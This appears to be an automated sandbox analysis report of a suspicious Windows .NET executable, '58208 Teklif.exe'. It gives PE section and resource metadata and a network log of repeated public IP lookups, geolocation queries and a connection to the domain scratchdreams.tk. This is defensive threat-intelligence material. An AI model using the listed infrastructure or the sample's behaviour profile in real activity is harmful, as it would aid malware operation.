                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xcb4000x3608.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x81f640x54.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x8223c0x82400296ff05f0b9740645c3fd44944c9468aFalse0.9414793516074856data7.939659429835133IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x860000x48a600x48c0055d17303af90a0aaec9680bdbec1ea2dFalse0.06316110932130584data4.772277429522695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xd00000xc0x20056866c8b8f76466dc7825728370875b5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x862e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                    RT_ICON0x869480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                    RT_ICON0x86c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                    RT_ICON0x86d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                    RT_ICON0x87c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                    RT_ICON0x884a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                    RT_ICON0x88a100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                    RT_ICON0xcaa380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                    RT_ICON0xccfe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                    RT_ICON0xce0880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                    RT_GROUP_ICON0xce4f00x92data0.5753424657534246
                                                    RT_VERSION0xce5840x2f0SysEx File - IDP0.44148936170212766
                                                    RT_MANIFEST0xce8740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 8, 2024 13:01:48.690182924 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:48.844340086 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:48.844527006 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:48.845681906 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:48.999202013 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:49.539989948 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:49.548007965 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:49.701742887 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:49.702605963 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:49.750509977 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:49.868834972 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:49.868884087 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:49.869095087 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:49.877718925 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:49.877737999 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.143743038 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.143873930 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.148926020 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.148945093 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.149322033 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.210649014 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.217885017 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.260247946 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.434067011 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.434169054 CEST44349711104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.434308052 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.442275047 CEST49711443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.446862936 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:50.601237059 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:50.603859901 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.603898048 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.604130983 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.604429960 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.604445934 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.656708002 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:50.861260891 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:50.889914989 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:50.889946938 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.160197973 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.160295010 CEST44349712104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.160590887 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.161027908 CEST49712443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.164868116 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.166383028 CEST4971380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.318478107 CEST8049709193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:51.318561077 CEST4970980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.320240974 CEST8049713193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:51.320318937 CEST4971380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.320504904 CEST4971380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.474296093 CEST8049713193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:51.475860119 CEST8049713193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:51.477493048 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.477519989 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.477581024 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.477891922 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.477906942 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.516063929 CEST4971380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:51.737184048 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:51.739408016 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:51.739425898 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.035379887 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.035492897 CEST44349714104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.035537004 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.036711931 CEST49714443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.052531958 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:52.206876040 CEST8049715193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:52.210766077 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:52.211030960 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:52.365554094 CEST8049715193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:52.366915941 CEST8049715193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:52.370347023 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.370407104 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.370615959 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.371355057 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.371370077 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.421457052 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:52.629376888 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.632445097 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.632462978 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.927491903 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.927598000 CEST44349717104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:52.927671909 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.928303003 CEST49717443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:52.932368994 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:52.933501959 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.086292982 CEST8049715193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.086363077 CEST4971580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.086406946 CEST8049719193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.086496115 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.086651087 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.240863085 CEST8049719193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.241333008 CEST8049719193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.243118048 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.243159056 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.243222952 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.243590117 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.243603945 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.297297955 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.502646923 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.505273104 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.505305052 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.802433968 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.802532911 CEST44349720104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:53.802582026 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.803188086 CEST49720443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:53.807853937 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.809135914 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.960949898 CEST8049719193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.961056948 CEST4971980192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.963282108 CEST8049721193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:53.963387012 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:53.963572979 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.117407084 CEST8049721193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:54.119596004 CEST8049721193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:54.121078968 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.121114969 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.121306896 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.121670961 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.121687889 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.172321081 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.378905058 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.381033897 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.381053925 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.675463915 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.675602913 CEST44349722104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:54.676297903 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.694022894 CEST49722443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:54.699714899 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.701838970 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.853585958 CEST8049721193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:54.853650093 CEST4972180192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.855583906 CEST8049723193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:54.855767012 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:54.855967999 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.009622097 CEST8049723193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.037714958 CEST8049723193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.039118052 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.039155006 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.039238930 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.039675951 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.039685965 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.078594923 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.298595905 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.300719023 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.300733089 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.598110914 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.598398924 CEST44349724104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.598541975 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.599204063 CEST49724443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.603230953 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.604851961 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.757018089 CEST8049723193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.757075071 CEST4972380192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.758409977 CEST8049725193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.758512974 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.758650064 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:55.912213087 CEST8049725193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.912643909 CEST8049725193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:55.914294004 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.914329052 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.914422989 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.914788961 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:55.914803028 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:55.953566074 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:56.173917055 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:56.176433086 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:56.176455975 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:56.471406937 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:56.471520901 CEST44349726104.21.67.152192.168.2.11
                                                    Apr 8, 2024 13:01:56.471611977 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:56.472430944 CEST49726443192.168.2.11104.21.67.152
                                                    Apr 8, 2024 13:01:56.486008883 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:56.639471054 CEST8049725193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:01:56.641144037 CEST4972580192.168.2.11193.122.130.0
                                                    Apr 8, 2024 13:01:56.854681015 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:56.854722977 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:01:56.854872942 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:56.855364084 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:56.855376959 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:01:57.121706009 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:01:57.121886015 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:57.123831034 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:57.123845100 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:01:57.124103069 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:01:57.125718117 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:01:57.172230959 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:02:28.314338923 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:02:28.314395905 CEST44349727172.67.169.18192.168.2.11
                                                    Apr 8, 2024 13:02:28.314546108 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:02:28.319888115 CEST49727443192.168.2.11172.67.169.18
                                                    Apr 8, 2024 13:02:56.479568005 CEST8049713193.122.130.0192.168.2.11
                                                    Apr 8, 2024 13:02:56.480092049 CEST4971380192.168.2.11193.122.130.0

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 8, 2024 13:01:48.556941986 CEST6115153192.168.2.111.1.1.1
                                                    Apr 8, 2024 13:01:48.682076931 CEST53611511.1.1.1192.168.2.11
                                                    Apr 8, 2024 13:01:49.742367983 CEST5610453192.168.2.111.1.1.1
                                                    Apr 8, 2024 13:01:49.867841959 CEST53561041.1.1.1192.168.2.11
                                                    Apr 8, 2024 13:01:56.485887051 CEST4919153192.168.2.111.1.1.1
                                                    Apr 8, 2024 13:01:56.853611946 CEST53491911.1.1.1192.168.2.11

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Apr 8, 2024 13:01:48.556941986 CEST192.168.2.111.1.1.10x40f4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:49.742367983 CEST192.168.2.111.1.1.10x95eeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:56.485887051 CEST192.168.2.111.1.1.10xebfaStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:48.682076931 CEST1.1.1.1192.168.2.110x40f4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:49.867841959 CEST1.1.1.1192.168.2.110x95eeNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:49.867841959 CEST1.1.1.1192.168.2.110x95eeNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:56.853611946 CEST1.1.1.1192.168.2.110xebfaNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                    Apr 8, 2024 13:01:56.853611946 CEST1.1.1.1192.168.2.110xebfaNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • reallyfreegeoip.org
                                                    • scratchdreams.tk
                                                    • checkip.dyndns.org

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1149709193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:48.845681906 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:49.539989948 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                    Apr 8, 2024 13:01:49.548007965 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Apr 8, 2024 13:01:49.702605963 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
                                                    Apr 8, 2024 13:01:50.446862936 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Apr 8, 2024 13:01:50.601237059 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1149713193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:51.320504904 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Apr 8, 2024 13:01:51.475860119 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.1149715193.122.130.0807580C:\Users\user\Desktop\58208 Teklif.exe
                                                    TimestampBytes transferredDirectionData
                                                    Apr 8, 2024 13:01:52.211030960 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Apr 8, 2024 13:01:52.366915941 CEST276INHTTP/1.1 200 OK
                                                    Date: Mon, 08 Apr 2024 11:01:52 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 107
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
